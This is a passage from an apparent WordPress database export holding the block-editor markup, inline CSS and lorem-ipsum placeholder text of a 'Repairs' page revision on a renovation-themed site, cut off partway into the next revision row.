margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f418c1e-e49c-4890-8c3d-eaf71da4329d\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"3e26ff63-7bd6-4f03-86ff-1350ade80280\"} -->\n<style type=\"text/css\"> .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3e26ff63-7bd6-4f03-86ff-1350ade80280 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"6a19d713-186a-4910-9f5c-54b320a56735\"} -->\n<style type=\"text/css\"> .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a19d713-186a-4910-9f5c-54b320a56735\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"facb2442-756a-47f1-b6b4-83468ea49299\"} -->\n<style type=\"text/css\"> .block-id-facb2442-756a-47f1-b6b4-83468ea49299 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-facb2442-756a-47f1-b6b4-83468ea49299 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-facb2442-756a-47f1-b6b4-83468ea49299 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-facb2442-756a-47f1-b6b4-83468ea49299 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7f542371-d3ae-4e67-8231-fceef37c9b26\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7f542371-d3ae-4e67-8231-fceef37c9b26\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"c85a4ad8-96ae-4e4d-b97a-7063fee7cd14\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"62839428-790f-482b-8f5a-8c01f4c41210\"} -->\n<style type=\"text/css\"> .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-62839428-790f-482b-8f5a-8c01f4c41210 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"45c85db5-b91f-4431-bd7e-5ba9b5a45b13\"} -->\n<style type=\"text/css\"> .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"f82dd4ec-7906-4c03-b1fd-205cbddf6ea8\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Repairs','','inherit','closed','closed','','269-revision-v1','','','2022-08-22 19:25:00','2022-08-22 19:25:00','',269,'https://cteisys.com/?p=373',0,'revision','',0),(374,1,'2022-08-22 19:25:50','2022-08-22 19:25:50','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ebd450c2-fa0b-4c48-a797-e737001ccee6\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-ebd450c2-fa0b-4c48-a797-e737001ccee6 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 